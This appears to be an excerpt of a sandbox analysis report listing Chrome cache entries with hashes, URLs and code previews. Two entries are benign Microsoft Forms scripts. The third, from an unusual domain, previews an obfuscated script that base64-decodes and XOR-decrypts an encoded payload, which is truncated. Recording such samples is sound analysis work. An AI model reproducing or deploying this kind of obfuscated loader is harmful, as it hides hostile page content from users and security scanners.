SHA-256:	D40E9F33813211AA5DFABEEBF4A1571D488E56878954DE4D513A25B3525B3988
SHA-512:	C90E8A26A10AFA84C74C1D4828466E75D0FB24E826BB984EE0C50C96E44488031D4F43068614559A77967BE58E63E5BB12D3BF0999F763725BC7E1C0BF75C6BB
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/vendors/combinedmin/basics_osi_v5_j3.min.3997ff6.js
Preview:	!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var i=t();for(var n in i)("object"==typeof exports?exports:e)[n]=i[n]}}(this,function(){return function(e){function t(n){if(i[n])return i[n].exports;var r=i[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var i={};return t.m=e,t.c=i,t.i=function(e){return e},t.d=function(e,i,n){t.o(e,i)\|\|Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var i=e&&e.e?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="",t(t.s=30)}([function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});!function(e){e[e.Unspecified=0]="Unspecified",e[e.String=1]="String",e[e.Int64=2]="Int64",e[e.Double=3]="Double",e[e.Boolean=4]="Boolean",e[e.Date=5]="Date"}(t.AWTPropertyType\|\|(t.AWTProperty

Chrome Cache Entry: 98

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (19569), with CRLF line terminators
Category:	downloaded
Size (bytes):	52547
Entropy (8bit):	5.360332468600038
Encrypted:	false
SSDEEP:
MD5:	162890ADA98A5DEF6640BBE57DA52EB9
SHA1:	06A3D551F9718164171E7517F18577B73F13B390
SHA-256:	DA599489D3F86D69769A1D310A5E59838D7E72EAD0BCFE94851D0084318FCDC2
SHA-512:	DDA7B8F4C63FABFCA8646CC059E6B3D50298985AFEE866680106B4610ADAFA58D078AF31EA8F81C2AE9FB2AD8BC579E64B7F4EC3B23987F278ADB410E24DBBBA
Malicious:	false
Reputation:	unknown
URL:	https://cdn.forms.office.net/forms/scripts/vendors/combinedmin/response_v2.min.5234a19.js
Preview:	/!.. linkify.js v2.1.8.. * https://github.com/SoapBox/linkifyjs.. * Copyright (c) 2014 SoapBox Innovations Inc... * Licensed under the MIT license.. */..!function(){"use strict";var n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n};!function(e){function a(n,e){var a=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},t=Object.create(n.prototype);for(var o in a)t[o]=a[o];return t.constructor=e,e.prototype=t,e}function t(n){n=n\|\|{},this.defaultProtocol=n.hasOwnProperty("defaultProtocol")?n.defaultProtocol:h.defaultProtocol,this.events=n.hasOwnProperty("events")?n.events:h.events,this.format=n.hasOwnProperty("format")?n.format:h.format,this.formatHref=n.hasOwnProperty("formatHref")?n.formatHref:h.formatHref,this.nl2br=n.hasOwnProperty("nl2br")?n.nl2br:h.nl2br,this.tagName=n.hasOwnProperty("tagName")?n.tagName:h.tagName,this.targ

Chrome Cache Entry: 99

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
Category:	downloaded
Size (bytes):	1812
Entropy (8bit):	6.0481684298982845
Encrypted:	false
SSDEEP:
MD5:	927D114E95306D7462079E52ABF92C87
SHA1:	CEEA06A6C2649B4EAAE914C56E7787CE419701B1
SHA-256:	23D7E2EFFB2AC057A0831F0B976B44BE98BED699C4BE6610452384535EAEA4BB
SHA-512:	F51913D42A27FFF9A233A37AE04FE028EF04DFE2349FBE0440C172D7511790B21021234E2DC1DEFF7A565F179CEE39F4E65571E5F08C7959B56A7F103D382915
Malicious:	false
Reputation:	unknown
URL:	https://0fs.akedespr.com/FVpjv4/
Preview:	<script>..function oRHUZgTWus(MViFgKyRVh, jkgCSkrvAI) {..let hrXGJYGPCy = '';..MViFgKyRVh = atob(MViFgKyRVh);..let RPWfRfVNKj = jkgCSkrvAI.length;..for (let i = 0; i < MViFgKyRVh.length; i++) {.. hrXGJYGPCy += String.fromCharCode(MViFgKyRVh.charCodeAt(i) ^ jkgCSkrvAI.charCodeAt(i % RPWfRfVNKj));..}..return hrXGJYGPCy;..}..var reDxGtlWTP = oRHUZgTWus(`BTYtKy8yPl98R08kPHkDFA8pCxRWNzgMZn9qFhgjXSo5dyotKQAFJFYrYDEnMSJPAjhbNjorbnNjWnxHXzAgOjIrJQ9RHnUEBzwXNAMoBmVMFAgyKzAiFBIlEGU1VExiakFROUs8biJLSGpBUW0ZZW55NCc+FAMjGSc6NidqKxUeLxEwHx8tLzgJBC5RbGd5e39qFCALUig8MTMhIlp8Rxllbnk7YikABS5RZWY8NDBjQQpAM2VueWZiakFRP1wxOysoYiwAHT5cfkNTZmJqQQxAMzhDUy8kYiQnCHE/FzY0NB9BTHAZZ2xwPU9AQVFtGTInNyItPU8dIlokOjApLGQJAyhfZXN5MSskBR46FykhOic2Iw4fY0kkOjEoIycEUWYZZ3F7ZmlqQxlvAkhEJEtIIwdZCG8ABiMfLTgXJG0YeHN5ZGBjGnxHGWVueS8kakkiAXgMKwgwCwMWWQhvAAYjHy04FyRkEGU1VExiakFRO1g3bj4/MxokNCJYMwV5e2IrFR4vEQAYHA44Ew4DO2xsdVRMYmpBUTtYN242EjMCDycqfT8FeXtiYgYIPGkACzYnNAFPHCxNJiZxaWoRPQZjFBhlGR0jZxswYGN1Y2BobxdKLWNiJGMjB28QUVx0ZD58

Static File Info

⊘No static file info